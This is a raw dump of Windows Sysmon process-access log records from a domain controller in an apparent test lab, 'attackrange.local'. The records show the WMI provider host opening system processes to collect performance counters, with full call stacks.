13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004761Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004760Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004759Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004758Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004757Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004756Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004755Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004754Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004753Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004752Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004751Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004750Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004749Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004748Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004747Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004746Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 